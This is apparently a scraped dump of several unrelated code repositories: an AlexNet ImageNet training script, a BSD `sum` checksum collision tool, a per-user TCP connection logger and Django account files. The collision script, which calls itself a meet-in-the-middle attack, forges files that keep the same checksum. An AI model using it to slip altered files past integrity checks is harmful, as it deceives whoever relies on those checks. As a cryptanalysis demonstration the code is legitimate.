import os
import sys
##############################################
# Command-line configuration, driven from one (flag, type, default) table.
parser = argparse.ArgumentParser()
_ARG_SPECS = (
    ('--epochs', int, 100),
    ('--batch_size', int, 128),
    ('--lr', float, 1e-2),
    ('--eps', float, 1.),
    ('--dropout', float, 0.5),
    ('--act', str, 'relu'),
    ('--bias', float, 0.),
    ('--gpu', int, 0),
    ('--dfa', int, 0),
    ('--sparse', int, 0),
    ('--rank', int, 0),
    ('--init', str, "glorot_uniform"),
    ('--save', int, 0),
    ('--name', str, "imagenet_alexnet"),
    ('--load', str, None),
)
for _flag, _type, _default in _ARG_SPECS:
    parser.add_argument(_flag, type=_type, default=_default)
args = parser.parse_args()
# Pin the process to the requested GPU before TensorFlow is imported.
if args.gpu >= 0:
    os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
    os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
# Machine-dependent dataset locations: Exxact workstation layout vs the
# scratch-cluster layout. Flip `exxact` to 1 on the workstation.
exxact = 0
if exxact:
    data_root = '/home/bcrafton3/Data_SSD/ILSVRC2012/'
else:
    data_root = '/usr/scratch/bcrafton/ILSVRC2012/'
val_path = data_root + 'val/'
train_path = data_root + 'train/'
# Ground-truth label files and the per-channel RGB mean used for centring.
val_labels = './imagenet_labels/validation_labels.txt'
train_labels = './imagenet_labels/train_labels.txt'
IMAGENET_MEAN = [123.68, 116.78, 103.94]
##############################################
import keras
import tensorflow as tf
import numpy as np
np.set_printoptions(threshold=1000)
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Activation
from lib.Activation import Relu
##############################################
def in_top_k(x, y, k):
    """Per example, return 1 if label `y` is among the `k` highest scores in `x`."""
    scores = tf.cast(x, dtype=tf.float32)
    truth = tf.cast(y, dtype=tf.int32)
    _, topk = tf.nn.top_k(input=scores, k=k)
    hits = tf.cast(tf.equal(truth, tf.transpose(topk)), dtype=tf.int32)
    return tf.reduce_sum(hits, axis=0)
##############################################
# Shared preprocessing (both training and validation):
# (1) decode the image from jpg format
# (2) resize so the image's smaller side is 256 pixels long
def parse_function(filename, label):
    """Decode one image file and resize its smaller side to 256 pixels."""
    raw = tf.read_file(filename)
    image = tf.cast(tf.image.decode_jpeg(raw, channels=3), tf.float32) # (1)
    smallest_side = 256.0
    height = tf.to_float(tf.shape(image)[0])
    width = tf.to_float(tf.shape(image)[1])
    # Scale relative to the shorter side so aspect ratio is preserved.
    scale = tf.cond(tf.greater(height, width),
                    lambda: smallest_side / width,
                    lambda: smallest_side / height)
    new_height = tf.to_int32(height * scale)
    new_width = tf.to_int32(width * scale)
    return tf.image.resize_images(image, [new_height, new_width]), label # (2)
# Training-time preprocessing:
# (3) random 227x227 crop of the scaled image
# (4) random horizontal flip with probability 1/2
# (5) subtract the per-channel mean `IMAGENET_MEAN`
# Note: no normalisation here, as VGG was trained without normalisation.
def train_preprocess(image, label):
    """Randomly crop/flip the image and centre it with IMAGENET_MEAN."""
    cropped = tf.random_crop(image, [227, 227, 3]) # (3)
    flipped = tf.image.random_flip_left_right(cropped) # (4)
    mean = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
    return flipped - mean, label # (5)
# Validation-time preprocessing:
# (3) central 227x227 crop of the scaled image
# (4) subtract the per-channel mean `IMAGENET_MEAN`
# Note: no normalisation here, as VGG was trained without normalisation.
def val_preprocess(image, label):
    """Centre-crop the image and subtract IMAGENET_MEAN."""
    cropped = tf.image.resize_image_with_crop_or_pad(image, 227, 227) # (3)
    mean = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
    return cropped - mean, label # (4)
##############################################
def get_validation_dataset():
    """Return (image paths, labels) for the ImageNet validation set.

    Images are sorted by filename so they line up with the label file;
    the trailing partial batch is dropped so every batch is full.
    """
    validation_images = []
    validation_labels = []
    print ("building validation dataset")
    for subdir, dirs, files in os.walk(val_path):
        for file in files:
            validation_images.append(os.path.join(val_path, file))
    validation_images = sorted(validation_images)
    # Read one integer label per line; `with` closes the previously leaked handle.
    with open(val_labels) as validation_labels_file:
        for labelline in validation_labels_file.readlines():
            validation_labels.append(int(labelline))
    # BUG FIX: when the set size divides the batch size exactly,
    # remainder == 0 and the old slice [:-0] == [:0] discarded everything.
    remainder = len(validation_labels) % args.batch_size
    if remainder:
        validation_images = validation_images[:-remainder]
        validation_labels = validation_labels[:-remainder]
    return validation_images, validation_labels
def get_train_dataset():
    """Return (image paths, labels) for the ImageNet training set.

    Each synset folder name is mapped to a dense integer label in the order
    it appears in the train-labels file; the trailing partial batch is
    dropped so every batch is full.
    """
    training_images = []
    training_labels = []
    labels = {}
    # `with` closes the handle (it previously leaked on exceptions).
    with open(train_labels, 'r') as f:
        for label_counter, labelline in enumerate(f.readlines()):
            labels[labelline.split(' ')[0]] = label_counter
    print ("building train dataset")
    for subdir, dirs, files in os.walk(train_path):
        for folder in dirs:
            for folder_subdir, folder_dirs, folder_files in os.walk(os.path.join(subdir, folder)):
                for file in folder_files:
                    training_images.append(os.path.join(folder_subdir, file))
                    training_labels.append(labels[folder])
    # BUG FIX: guard remainder == 0, where [:-0] would drop the whole set.
    remainder = len(training_labels) % args.batch_size
    if remainder:
        training_images = training_images[:-remainder]
        training_labels = training_labels[:-remainder]
    return training_images, training_labels
###############################################################
# Feedable placeholders for the lists of file paths and integer labels.
filename = tf.placeholder(tf.string, shape=[None])
label = tf.placeholder(tf.int64, shape=[None])
###############################################################
# Validation input pipeline: shuffle, decode/resize, centre-crop, batch.
val_imgs, val_labs = get_validation_dataset()
val_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
val_dataset = val_dataset.shuffle(len(val_imgs))
val_dataset = val_dataset.map(parse_function, num_parallel_calls=4)
val_dataset = val_dataset.map(val_preprocess, num_parallel_calls=4)
val_dataset = val_dataset.batch(args.batch_size)
val_dataset = val_dataset.repeat()
val_dataset = val_dataset.prefetch(8)
###############################################################
# Training input pipeline: shuffle, decode/resize, random crop/flip, batch.
train_imgs, train_labs = get_train_dataset()
train_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
train_dataset = train_dataset.shuffle(len(train_imgs))
train_dataset = train_dataset.map(parse_function, num_parallel_calls=4)
train_dataset = train_dataset.map(train_preprocess, num_parallel_calls=4)
train_dataset = train_dataset.batch(args.batch_size)
train_dataset = train_dataset.repeat()
train_dataset = train_dataset.prefetch(8)
###############################################################
# One graph, two iterators: the string handle selects train/val at feed time.
handle = tf.placeholder(tf.string, shape=[])
iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)
features, labels = iterator.get_next()
features = tf.reshape(features, (-1, 227, 227, 3))
labels = tf.one_hot(labels, depth=1000)
train_iterator = train_dataset.make_initializable_iterator()
val_iterator = val_dataset.make_initializable_iterator()
###############################################################
# Select the activation for the hidden layers.
if args.act == 'tanh':
    # BUG FIX: Tanh is not imported at the top of this file (only
    # Activation and Relu are), so `--act tanh` raised NameError.
    from lib.Activation import Tanh
    act = Tanh()
elif args.act == 'relu':
    act = Relu()
else:
    assert(False)
###############################################################
# Conv layers start from pre-trained AlexNet weights; FC layers from scratch.
weights_conv = './transfer/alexnet_weights.npy'
weights_fc = None
# A layer group is trainable only when no pre-trained file was supplied
# (idiom fix: `is None` instead of `== None`).
train_conv = weights_conv is None
train_fc = weights_fc is None
###############################################################
# Per-step feeds: effective batch size, dropout rate and learning rate.
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
###############################################################
# AlexNet-style network for 227x227 inputs and 1000 classes; the
# FeedbackConv/FeedbackFC layers carry the fixed feedback weights used
# by the --dfa training path.
l0 = Convolution(input_shape=[batch_size, 227, 227, 3], filter_sizes=[11, 11, 3, 96], init=args.init, strides=[1,4,4,1], padding="VALID", activation=act, bias=args.bias, load=weights_conv, name='conv1', train=train_conv)
l1 = MaxPool(size=[batch_size, 55, 55, 96], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l2 = FeedbackConv(size=[batch_size, 27, 27, 96], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv1_fb')
l3 = Convolution(input_shape=[batch_size, 27, 27, 96], filter_sizes=[5, 5, 96, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv2', train=train_conv)
l4 = MaxPool(size=[batch_size, 27, 27, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l5 = FeedbackConv(size=[batch_size, 13, 13, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv2_fb')
l6 = Convolution(input_shape=[batch_size, 13, 13, 256], filter_sizes=[3, 3, 256, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv3', train=train_conv)
l7 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv3_fb')
l8 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv4', train=train_conv)
l9 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv4_fb')
l10 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv5', train=train_conv)
l11 = MaxPool(size=[batch_size, 13, 13, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l12 = FeedbackConv(size=[batch_size, 6, 6, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv5_fb')
l13 = ConvToFullyConnected(input_shape=[6, 6, 256])
l14 = FullyConnected(input_shape=6*6*256, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc1', train=train_fc)
l15 = Dropout(rate=dropout_rate)
l16 = FeedbackFC(size=[6*6*256, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l17 = FullyConnected(input_shape=4096, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc2', train=train_fc)
l18 = Dropout(rate=dropout_rate)
l19 = FeedbackFC(size=[4096, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l20 = FullyConnected(input_shape=4096, size=1000, init=args.init, bias=args.bias, load=weights_fc, name='fc3', train=train_fc)
###############################################################
# Assemble the model, choose backprop or DFA gradients, and build the
# train op plus per-batch top-1/top-5 correct counts.
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l14, l15, l16, l17, l18, l19, l20])
predict = tf.nn.softmax(model.predict(X=features))
weights = model.get_weights()
if args.dfa:
    grads_and_vars = model.dfa_gvs(X=features, Y=labels)
else:
    grads_and_vars = model.gvs(X=features, Y=labels)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
correct = tf.equal(tf.argmax(predict,1), tf.argmax(labels,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
top5 = in_top_k(predict, tf.argmax(labels,1), k=5)
total_top5 = tf.reduce_sum(tf.cast(top5, tf.float32))
###############################################################
# TF session: allow soft placement and grow GPU memory on demand.
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
# String handles used to switch the shared iterator between train and val.
train_handle = sess.run(train_iterator.string_handle())
val_handle = sess.run(val_iterator.string_handle())
###############################################################
# Create the results log, recording the run name and parameter count.
results_filename = args.name + '.results'
# Use a context manager so the handle is closed even if a write fails
# (the original open/close pair leaked the handle on error).
with open(results_filename, "w") as f:
    f.write(results_filename + "\n")
    f.write("total params: " + str(model.num_params()) + "\n")
###############################################################
# Accuracy history across epochs; `phase` drives a crude learning-rate
# decay schedule based on the change in validation accuracy.
train_accs = []
train_accs_top5 = []
val_accs = []
val_accs_top5 = []
phase = 0
lr_decay = args.lr
for ii in range(args.epochs):
    # Training pass over the (remainder-trimmed) training set.
    sess.run(train_iterator.initializer, feed_dict={filename: train_imgs, label: train_labs})
    train_total = 0.0
    train_correct = 0.0
    train_top5 = 0.0
    for j in range(0, len(train_imgs), args.batch_size):
        [_total_correct, _top5, _] = sess.run([total_correct, total_top5, train], feed_dict={handle: train_handle, batch_size: args.batch_size, dropout_rate: args.dropout, lr: lr_decay})
        train_total += args.batch_size
        train_correct += _total_correct
        train_top5 += _top5
        train_acc = train_correct / train_total
        train_acc_top5 = train_top5 / train_total
        # Log the running accuracy every 1000 batches.
        if (j % (1000 * args.batch_size) == 0):
            p = "train accuracy: %f %f" % (train_acc, train_acc_top5)
            print (p)
            with open(results_filename, "a") as f:
                f.write(p + "\n")
    train_accs.append(train_acc)
    train_accs_top5.append(train_acc_top5)
    ##################################################################
    # Validation pass: dropout off, learning rate fed but unused.
    sess.run(val_iterator.initializer, feed_dict={filename: val_imgs, label: val_labs})
    val_total = 0.0
    val_correct = 0.0
    val_top5 = 0.0
    for j in range(0, len(val_imgs), args.batch_size):
        [_total_correct, _top5] = sess.run([total_correct, total_top5], feed_dict={handle: val_handle, batch_size: args.batch_size, dropout_rate: 0.0, lr: 0.0})
        val_total += args.batch_size
        val_correct += _total_correct
        val_top5 += _top5
        val_acc = val_correct / val_total
        val_acc_top5 = val_top5 / val_total
        if (j % (1000 * args.batch_size) == 0):
            p = "val accuracy: %f %f" % (val_acc, val_acc_top5)
            print (p)
            with open(results_filename, "a") as f:
                f.write(p + "\n")
    val_accs.append(val_acc)
    val_accs_top5.append(val_acc_top5)
    # Decay the learning rate when validation accuracy plateaus.
    if phase == 0:
        phase = 1
        print ('phase 1')
    elif phase == 1:
        dacc = val_accs[-1] - val_accs[-2]
        if dacc <= 0.01:
            lr_decay = 0.1 * args.lr
            phase = 2
            print ('phase 2')
    elif phase == 2:
        dacc = val_accs[-1] - val_accs[-2]
        if dacc <= 0.005:
            lr_decay = 0.05 * args.lr
            phase = 3
            print ('phase 3')
    # Checkpoint weights (and accuracy curves) after every epoch if requested.
    if args.save:
        # BUG FIX: the feed used the undefined name `learning_rate`; the
        # learning-rate placeholder in this graph is `lr` (NameError before).
        [w] = sess.run([weights], feed_dict={handle: val_handle, dropout_rate: 0.0, lr: 0.0})
        w['train_acc'] = train_accs
        w['train_acc_top5'] = train_accs_top5
        w['val_acc'] = val_accs
        w['val_acc_top5'] = val_accs_top5
        np.save(args.name, w)
    print('epoch %d/%d' % (ii, args.epochs))
--- FILE SEPARATOR ---
import tensorflow as tf
import numpy as np
import math
from lib.Layer import Layer
from lib.Activation import Activation
from lib.Activation import Linear
from lib.init_tensor import init_matrix
class FullyConnected(Layer):
    """Dense (fully connected) layer for the TF1 graph-mode framework.

    Holds a weight matrix and bias vector as tf.Variables; supports loading
    previously saved parameters from an .npy dict keyed by layer name.
    """

    def __init__(self, input_shape, size, init, activation=None, bias=0., use_bias=True, name=None, load=None, train=True):
        self.input_size = input_shape
        self.output_size = size
        self.init = init
        self.activation = Linear() if activation is None else activation
        self.name = name
        self.train_flag = train
        self.use_bias = use_bias
        if load:
            # Restore parameters saved by a previous run (dict keyed by name).
            print ("Loading Weights: " + self.name)
            stored = np.load(load, encoding='latin1', allow_pickle=True).item()
            w_init = stored[self.name]
            b_init = stored[self.name + '_bias']
        else:
            b_init = np.ones(shape=self.output_size) * bias
            w_init = init_matrix(size=(self.input_size, self.output_size), init=self.init)
        self.weights = tf.Variable(w_init, dtype=tf.float32)
        self.bias = tf.Variable(b_init, dtype=tf.float32)

    ###################################################################

    def get_weights(self):
        """Name/variable pairs for checkpointing."""
        return [(self.name, self.weights), (self.name + "_bias", self.bias)]

    def num_params(self):
        """Total trainable scalar count (weights + bias)."""
        return self.input_size * self.output_size + self.output_size

    def forward(self, X):
        """X @ W (+ b) followed by the activation; cache is unused here."""
        pre = tf.matmul(X, self.weights)
        if self.use_bias:
            pre = pre + self.bias
        return {'aout': self.activation.forward(pre), 'cache': {}}

    ###################################################################

    def bp(self, AI, AO, DO, cache):
        """Backprop: returns the input gradient and (grad, var) pairs."""
        delta = tf.multiply(DO, self.activation.gradient(AO))
        dx = tf.matmul(delta, tf.transpose(self.weights))
        dw = tf.matmul(tf.transpose(AI), delta)
        db = tf.reduce_sum(delta, axis=0)
        if self.train_flag:
            return {'dout': dx, 'cache': {}}, [(dw, self.weights), (db, self.bias)]
        return {'dout': dx, 'cache': {}}, []

    def dfa(self, AI, AO, E, DO, cache):
        # Direct feedback alignment falls back to ordinary backprop here.
        return self.bp(AI, AO, DO, cache)

    def lel(self, AI, AO, DO, Y, cache):
        # Local error learning also delegates to backprop.
        return self.bp(AI, AO, DO, cache)
###################################################################
|
[
"/cifar10_fc.py",
"/get_results.py",
"/imagenet_alexnet.py",
"/lib/FullyConnected.py"
] |
00mjk/sumcoll
|
#!/usr/bin/env python3
import sys, collections
import sum, backwards
# middle.py
# A meet-in-the-middle attack on the BSD sum algorithm
# We take advantage of the birthday paradox and search for prefix extensions
# and suffix extensions simultanously.
def search(start: int, end: int, charset: bytes) -> bytes:
    """
    Meet-in-the-middle search for a BSD-sum collision.

    Grows printable prefixes forward from `start` and suffixes backward
    from `end` in lockstep (birthday-paradox speedup); returns the first
    insertion string whose forward and backward checksums meet.
    """
    forward_queue = collections.deque([(b'', start)])
    backward_queue = collections.deque([(b'', end)])
    seen_prefixes = {start: b''}
    seen_suffixes = {end: b''}
    while True:
        # Expand one prefix by every candidate character.
        base, cksum = forward_queue.popleft()
        for ch in charset:
            nxt = sum.add(cksum, ch)
            candidate = base + bytes([ch])
            match = seen_suffixes.get(nxt)
            if match is not None:
                return candidate + match
            if seen_prefixes.get(nxt) is None:
                forward_queue.append((candidate, nxt))
                seen_prefixes[nxt] = candidate
        # Expand one suffix symmetrically, running the sum in reverse.
        base, cksum = backward_queue.popleft()
        for ch in charset:
            nxt = backwards.sub(cksum, ch)
            candidate = bytes([ch]) + base
            match = seen_prefixes.get(nxt)
            if match is not None:
                return match + candidate
            if seen_suffixes.get(nxt) is None:
                backward_queue.append((candidate, nxt))
                seen_suffixes[nxt] = candidate
if __name__ == "__main__":
    # usage: middle.py <infile> <offset> <outfile>
    filename = sys.argv[1]
    offset = int(sys.argv[2])
    # Fix: the input handle was opened without ever being closed.
    with open(filename, 'rb') as fin:
        data = fin.read()
    # Checksum state just before the insertion point, and the reverse-run
    # state the suffix must start from to keep the overall sum unchanged.
    start, _ = sum.compute_sum(data[:offset])
    end = backwards.backwards_sum(data[offset:], 0)
    charset = bytes(range(ord(' '), ord('~')+1))  # printable ASCII
    added = search(start, end, charset)
    print(added)
    # Fix: the output file was never closed/flushed; a context manager
    # guarantees the collision file is fully written.
    with open(sys.argv[3], 'wb') as out:
        out.write(data[:offset])
        out.write(added)
        out.write(data[offset:])
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import sys, os, random
import sum
# backwards.py
# Compute the bsd `sum` algorithm in reverse
# Used for computing collisions and modifying
# somewhere in the middle of the file.
def rotate_left_16bit(data: int) -> int:
    """Rotate a 16-bit value left by one bit (bit 15 wraps to bit 0)."""
    wrapped = data >> 15
    shifted = (data << 1) & 0xffff
    return shifted | wrapped
def sub(sum: int, byte: int) -> int:
    """Undo one BSD-sum step: subtract the byte (mod 2^16), rotate left."""
    without_byte = (sum - byte) & 0xffff
    return rotate_left_16bit(without_byte)
def backwards_sum(data: bytes, sum: int) -> int:
    """
    Run the BSD sum in reverse over `data`.

    Returns the checksum a prefix must have so that appending `data`
    yields the given `sum`.
    """
    for byte in data[::-1]:
        sum = sub(sum, byte)
    return sum
def test():
    """
    Cross-check backwards_sum against the forward implementation.

    Builds two random blobs, checksums the concatenation and the prefix
    forwards, then runs the suffix backwards from the total and requires
    that it lands exactly on the prefix checksum.
    """
    left = os.urandom(random.randint(10, 10000))
    right = os.urandom(random.randint(10, 10000))
    combined, _ = sum.compute_sum(left + right)
    expected, _ = sum.compute_sum(left)
    recovered = backwards_sum(right, combined)
    assert recovered == expected
if __name__ == "__main__":
    # "test" mode: self-check 1000 random prefix/suffix pairs.
    argc = len(sys.argv)
    if argc == 2 and sys.argv[1] == "test":
        for _ in range(1000):
            test()
        print("tests passed")
    elif argc != 3:
        print("Usage: backwards.py file checksum")
        print("backwards.py test")
    else:
        # Report the prefix checksum that reaches the given target.
        with open(sys.argv[1], "rb") as handle:
            print(backwards_sum(handle.read(), int(sys.argv[2])))
--- FILE SEPARATOR ---
#!/usr/bin/env python3
### Sum.py
### An implementation of the BSD `sum` checksum in python.
import math, sys
from typing import Iterable, Tuple
def rotate_right_16bit(data: int) -> int:
    """Rotate a 16-bit value right by one bit (bit 0 wraps to bit 15)."""
    wrapped = (data & 1) << 15
    return wrapped | (data >> 1)
def add(sum: int, byte: int) -> int:
    """One BSD-sum step: rotate right, add the byte, clamp to 16 bits."""
    return (rotate_right_16bit(sum) + byte) & 0xffff
def compute_sum(data: bytes) -> Tuple[int, int]:
    """
    Compute the BSD `sum` checksum over data.

    Returns the 16-bit checksum and the size in 1024-byte blocks
    (rounded up), matching what the classic utility reports.
    """
    checksum = 0
    for byte in data:
        checksum = add(checksum, byte)
    blocks = math.ceil(len(data) / 1024)
    return checksum, blocks
def format_sum(sum: int, blocks: int):
    """Render checksum and block count the way BSD `sum` prints them:
    zero-padded 5-digit checksum, space, right-aligned width-5 blocks."""
    return f"{sum:05} {blocks:5}"
if __name__ == "__main__":
    paths = sys.argv[1:]
    if paths:
        # Checksum each named file; report (but do not abort on) failures.
        for filename in paths:
            try:
                with open(filename, "rb") as fp:
                    checksum, blocks = compute_sum(fp.read())
                    print(format_sum(checksum, blocks), filename)
            except Exception as e:
                print(e)
    else:
        # No arguments: act as a filter over binary stdin.
        checksum, blocks = compute_sum(sys.stdin.buffer.read())
        print(format_sum(checksum, blocks))
|
[
"/attack.py",
"/backwards.py",
"/sum.py"
] |
00mjk/tcplogger
|
"""Class for cache of UIDs"""
import json
import subprocess as sp
import sys
ID = "/bin/id"
class UserIDs(object):
    """Bidirectional user <-> uid cache, optionally backed by a JSON file.

    The cache stores both directions (user -> uid and uid -> user) in one
    dict so either key resolves the other.
    """

    def __init__(self, ids=None, name=None):
        self.ids = ids if ids is not None else {}
        # Fix: `name` was accepted but never stored, so close() raised
        # AttributeError unless load() had been called first.
        self.name = name

    def load(self, cache):
        """Attempts to load a preexisting cache; missing/corrupt files are ignored."""
        self.name = cache
        try:
            # Fix: the file handle was previously never closed; also narrow
            # the bare except so unrelated bugs are not silently swallowed
            # (OSError covers a missing file, ValueError a bad JSON body).
            with open(cache) as fp:
                self.ids = json.load(fp)
        except (OSError, ValueError):
            pass

    def access(self, user):
        """Access information in cache (raises KeyError when absent)."""
        return self.ids[user]

    def add(self, user, uid):
        """Adds user and uid to cache, indexed in both directions."""
        self.ids[user] = uid
        self.ids[uid] = user

    def have(self, user):
        """Check if user's information is in cache."""
        return user in self.ids

    def remove(self, user):
        """Remove user and uid from cache; 0 on success, 1 when absent."""
        try:
            del self.ids[self.ids[user]]
            del self.ids[user]
            return 0
        except KeyError:
            return 1

    def clear(self):
        """Clear cache."""
        self.ids.clear()

    def resolve(self, user, pslines, unknowns):
        """Resolves an unknown user's uid via /bin/id, falling back to ps output.

        Unresolvable users are recorded in `unknowns` and None is returned.
        NOTE(review): check_output returns bytes on Python 3, so the cached
        uid would be bytes there — confirm the intended interpreter.
        """
        try:
            return sp.check_output([ID, "-u", user], stderr=sys.stderr).rstrip()
        except sp.CalledProcessError:
            try:
                for line in pslines:
                    if line.strip().split()[0] == user:
                        # NOTE(review): fixed slice offsets assume a specific
                        # `ps aux` column layout — verify on the target host.
                        search = line[65:]
                        found = search.find("sshd: ")
                        if found != -1:
                            return search[6:13]
                unknowns.add(user)
                return None
            except (sp.CalledProcessError, IndexError):
                # Fix: malformed ps lines raise IndexError from split()[0],
                # which previously escaped this best-effort fallback.
                unknowns.add(user)
                return None

    def close(self):
        """Safely saves the cache to its backing JSON file and closes it."""
        # Fix: use a context manager so the handle is closed even on error.
        with open(self.name, "w") as json_file:
            json_file.write(json.dumps(self.ids))
--- FILE SEPARATOR ---
#!/usr/bin/env python
"""Logger for TCP connections by user"""
import argparse
import csv
import random
import subprocess as sp
import sys
import tempfile
import time
from ids import UserIDs
# Absolute paths of the external tools this logger shells out to.
CAT = "/bin/cat"
ID = "/bin/id"
PS = "/bin/ps"
# CSV column order for every logged connection sample.
HEADER = ['time', 'user', 'pid', 'uid', 'proc', 'act']
parser = argparse.ArgumentParser(description='Unix-like TCP Logger')
parser.add_argument("-f", "--filename", nargs='?', const='_', default='_',
                    metavar="filename", help="Writes to specified filename")
parser.add_argument("-c", "--cache", nargs=1, metavar="cachefile",
                    help="Loads from specified cache")
parser.add_argument("-C", "--clear", action='store_true', help="Clears cache")
args = parser.parse_args()
mapped = UserIDs()
unknowns = set()  # users whose uid could not be resolved; skipped thereafter
# Tries to open cache, and creates one if it doesn't already exist
if args.cache:
    mapped.load(args.cache[0])
# "_" (the default) means no file was given: write to stdout, using a
# throwaway temp file only to satisfy the open() below.
if args.filename == "_":
    temp = tempfile.NamedTemporaryFile()
    filename = temp.name
else:
    filename = args.filename
# Creates csv file
with open(filename, 'w') as csv_file:
    if args.filename == "_":
        csv_file = sys.stdout
    writer = csv.DictWriter(csv_file, fieldnames=HEADER)
    writer.writeheader()
    try:
        # Sample forever until Ctrl-C.
        while True:
            # Saves a snapshot of TCP and UID information
            # NOTE(review): check_output returns bytes on Python 3; the string
            # comparisons below suggest this targets Python 2 — confirm.
            ps = sp.check_output([PS, "aux"])
            tcp = sp.check_output([CAT, "/proc/net/tcp"])
            snap = time.time()
            # Cleans the data
            pslines = ps.splitlines()
            tcplines = tcp.splitlines()
            user = random.choice(pslines).strip().split()
            # Ignores noise
            while user[0] == "root" or user[0] == "USER" or user[0] == "libstor+":
                user = random.choice(pslines).strip().split()
            length = len(user)
            if length > 11:
                # Command contained spaces: rejoin the trailing fields.
                proc = ''.join(user[10:length])
            else:
                proc = user[10]
            pid = user[1]
            user = user[0]
            # Relies on cache first for finding user information
            if mapped.have(user):
                uid = mapped.access(user)
            # Ignores username or uid if misconfigured
            elif user in unknowns:
                continue
            # Attempts to figure out username and uid
            else:
                uid = mapped.resolve(user, pslines, unknowns)
                if uid is None:
                    continue
                mapped.add(user, uid)
            # Checks and corrects uid misconfiguration from ps table
            if user.isdigit():
                user, uid = mapped.access(user), mapped.access(uid)
            # Finds all of a given user's active TCP connections
            # (field 7 of /proc/net/tcp is the owning uid).
            acts = []
            for line in tcplines:
                if line.strip().split()[7] == uid:
                    acts.append(line)
            # Randomly assigns TCP connection to process
            if acts:
                act = random.choice(acts).rstrip()
                if act:
                    writer.writerow({'time': snap, 'user': user, 'pid': pid,
                                     'uid': uid, 'proc': proc, 'act': act})
    # Actions to be executed upon shutdown
    except KeyboardInterrupt:
        if args.filename == "_":
            temp.close()
        if args.cache:
            if args.clear:
                mapped.clear()
            mapped.close()
--- FILE SEPARATOR ---
#!/usr/bin/env python
"""Offline cache editor"""
import argparse
from ids import UserIDs
# Command-line editor for a UserIDs JSON cache; exits 0 on success,
# 1 when a requested deletion target is not present.
parser = argparse.ArgumentParser(description='Offline cache editor')
parser.add_argument("cache", help="Required cache file")
parser.add_argument("-a", "--add", nargs=2, metavar=('username', 'uid'),
                    help="Adds specified username and uid to cache")
parser.add_argument("-d", "--delete", nargs=1, metavar='username|uid',
                    help="Deletes specified username or uid from cache")
parser.add_argument("-C", "--clear", action='store_true', help="Clears all cache")
args = parser.parse_args()
mapped = UserIDs()
mapped.load(args.cache)
code = 0
# Add specified username and uid to cache
if args.add:
    user, uid = args.add[0], args.add[1]
    # Fix: the parsed pair was previously unpacked but never stored,
    # making --add a silent no-op.
    mapped.add(user, uid)
# Deletes specified username or uid from cache
if args.delete:
    user = args.delete[0]
    if mapped.have(user):
        code = mapped.remove(user)
    else:
        code = 1
# Clears all cache
if args.clear:
    mapped.clear()
# Persist whatever edits were made back to the cache file.
mapped.close()
exit(code)
|
[
"/ids.py",
"/log.py",
"/offline.py"
] |
00mohamad00/CourseWebsite-Django
|
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm
from .models import Account
class SignUpForm(UserCreationForm):
    """Registration form for Account: UserCreationForm plus a required email,
    name fields and the optional student_id."""
    email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
    class Meta:
        model = Account
        fields = ('username', 'email', 'password1', 'password2', 'first_name', 'last_name','student_id')
class LoginForm(forms.Form):
    """Plain username/password login form; the password input is masked."""
    username = forms.CharField()
    password = forms.CharField(widget=forms.PasswordInput)
--- FILE SEPARATOR ---
from django.contrib.auth.models import AbstractUser
from django.db import models
class Account(AbstractUser):
    """Custom user model extending Django's AbstractUser with a student number."""
    # Optional university student number; verbose_name is the Persian UI label.
    student_id = models.IntegerField(blank=True, null=True, verbose_name='شماره دانشجویی') # TODO: set validator
--- FILE SEPARATOR ---
from django.urls import path
from .views import logout_account, LoginAccount, SignUpView, ChaneID
# Routes for the account app: auth pages plus the student-id editor.
urlpatterns = [
    path('login/', LoginAccount.as_view(), name='login'),
    path('signup/', SignUpView.as_view(), name='signup'),
    path('logout/', logout_account, name='logout'),
    # NOTE: "ChaneID" (sic) is the imported class name; renaming it would
    # touch the views module too, so the typo is kept here.
    path('id/', ChaneID.as_view(), name='change_id'),
]
--- FILE SEPARATOR ---
